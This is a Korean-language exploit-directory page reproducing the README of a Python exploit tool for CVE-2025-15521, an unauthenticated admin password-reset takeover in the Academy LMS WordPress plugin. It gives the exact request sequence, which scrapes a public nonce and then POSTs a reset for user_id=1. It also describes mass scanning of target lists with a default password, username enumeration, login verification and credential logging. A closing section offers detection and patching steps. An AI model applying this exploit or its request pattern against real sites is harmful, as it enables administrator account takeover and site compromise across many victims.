Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-15521 — Academy LMS – WordPress LMS Plugin for Complete eLearning Solution(완전한 eLearning 솔루션용 WordPress LMS 플러그인)은 3.5.0을 포함한 모든 버전에서 계정 탈취를 통한 권한 상승에 취약합니다. | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-15521
ReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingAuthentication
GitHubnxploited/cve-2025-15521

CVE-2025-15521

Academy LMS – WordPress LMS Plugin for Complete eLearning Solution(완전한 eLearning 솔루션용 WordPress LMS 플러그인)은 3.5.0을 포함한 모든 버전에서 계정 탈취를 통한 권한 상승에 취약합니다.

1195개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2025-15521

WordPress용 Academy LMS – WordPress LMS Plugin for Complete eLearning Solution 플러그인은 3.5.0을 포함한 모든 버전에서 계정 탈취를 통한 권한 상승 취약점에 노출되어 있습니다.

 _____ _____ _____     ___ ___ ___ ___     ___   ___ ___ ___ ___  
|     |  |  |   __|___|_  |   |_  |  _|___|_  | |  _|  _|_  |_  | 
|   --|  |  |   __|___|  _| | |  _|_  |___|_| |_|_  |_  |  _|_| |_
|_____|\___/|_____|   |___|___|___|___|   |_____|___|___|___|_____|

Telegram CVE CVSS Python

📡 @KNxploited 팔로우 — CVE 공개 및 동작하는 익스플로잇을 지연 없이 확인하세요.


이 취약점은 무엇인가

CVE-2025-15521 — Academy LMS ≤ 3.5.0에서 비밀번호 재설정을 통한 비인증 계정 탈취 취약점입니다.

이 플러그인의 재설정 핸들러는 강좌 페이지에 포함된 공개적으로 노출된 nonce(academy_nonce)만으로 요청을 인증합니다. 사용자 이메일로 전송되는 토큰도 없고, 세션 검사도 없으며, 신원 검증도 없습니다. 아무 강좌 페이지나 읽은 공격자는 유효한 nonce를 얻은 다음 user_id를 지정해 모든 계정의 비밀번호를 재설정할 수 있습니다 — 여기에는 user_id=1(사이트 관리자)도 포함됩니다.

CVSS 3.1: 9.8 Critical — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNA: Wordfence


취약점 작동 방식

GET /course/any-course/
  → HTML contains: "academy_nonce": "a1b2c3d4e5"   ← public, no auth

POST /academy-retrieve-password/?user_id=1
  new_password=<anything>
  confirm_new_password=<anything>
  security=a1b2c3d4e5                               ← nonce accepted

  → Password for user_id=1 changed. No email. No confirmation.

핸들러는 모든 방문자에게 공개되는 nonce에 대해 wp_verify_nonce()만 검증한 뒤 wp_set_password()를 호출합니다. 요청 사용자가 변경 대상 계정의 소유자인지 확인하는 검사는 전혀 없습니다.


이 스크립트가 수행하는 작업

  1. 강좌 페이지를 크롤링하여 유효한 academy_nonce를 추출합니다.
  2. 선택한 비밀번호로 대상 user_id에 대해 재설정 핸들러를 실행합니다.
  3. /?author=N 리다이렉트와 REST API(/wp-json/wp/v2/users)를 통해 사용자 이름을 열거합니다.
  4. 각 후보에 대해 엄격한 로그인을 시도합니다:
    • 알려진 실패 메시지 거부
    • wordpress_logged_in 쿠키 요구
    • 단순 200 응답이 아닌 /wp-admin의 실제 관리자 UI 마커 요구
  5. 확인된 접근 항목을 출력 파일에 기록합니다 — 민감한 정보는 터미널에 출력되지 않습니다.

요구 사항

pip install requests colorama urllib3

Python 3.8+ 필요. Python 3.10+ 권장.


사용 방법

python CVE-2025-15521.py

다음 항목을 묻는 프롬프트가 표시됩니다:

Targets list file (one URL per line): list.txt
Threads (concurrent sites) [5]: 10
Reset handler path [/academy-retrieve-password/]:
Course root path (key source) [/course/]:
Max /course/ subpages to scan per site [15]:
user_id to reset (handler target) [1]:
New password to set [adminSA]:
HTTP timeout (seconds) [10]:
Output file [scan_results/academy_access_success.txt]:

대상 파일 — 줄마다 URL 하나씩, scheme(프로토콜)은 선택 사항:

https://target1.com
target2.com
https://target3.com/lms

출력

터미널 — 대상당 한 줄, 자격 증명은 출력되지 않음:

[14:02:11] [https://target.com] KEY: OK   | RESET: OK   | ACCESS: 1 HIT
[14:02:13] [https://target2.com] KEY: FAIL | RESET: -    | ACCESS: 0 HIT

파일 — 확인된 접근 항목만 기록:

[2025-04-18T14:02:11] https://target.com - account=admin  pass=adminSA

탐지 및 수정

방어자를 위한 조치:

재설정 엔드포인트로 전송되는 비인증 POST 요청을 차단하거나 모니터링하세요:

POST *academy-retrieve-password* with parameter: security=

테마의 강좌 페이지 소스에서 rm_admin_order / academy_nonce 노출 여부를 확인하세요. 로그인하지 않은 상태에서 nonce가 보인다면 해당 버전은 취약한 것입니다.

즉시 수정 단계:

  • Academy LMS를 3.5.0보다 높은 버전으로 업데이트하세요.
  • 패치가 없는 경우 플러그인을 임시로 비활성화하세요.
  • 최근에 변경된 관리자 비밀번호를 감사하세요.
  • 모든 관리자 계정에 비밀번호 재설정을 강제하세요.
  • 모든 비밀번호 재설정 흐름에 이메일 기반 토큰 검증을 도입하세요.

⚠️ 면책 조항

이 도구는 승인된 보안 연구 및 침투 테스트 목적으로만 사용하세요.
자신이 소유했거나 명시적인 서면 허가를 받은 시스템에서만 실행하세요.
저자는 무단 또는 불법 사용에 대한 책임을 지지 않습니다.
무단 사용은 CFAA, CMA, EU 지침 2013/40/EU, 사우디아라비아 사이버 범죄 방지법(제M/17호) 및 전 세계의 동등한 법률을 위반합니다.


By Nxploited (Khaled Alenazi)
t.me/KNxploited · github.com/Nxploited

🔔 최신 CVE 및 익스플로잇 릴리스를 확인하려면 Telegram에서 @KNxploited를 팔로우하세요.

도구 다운로드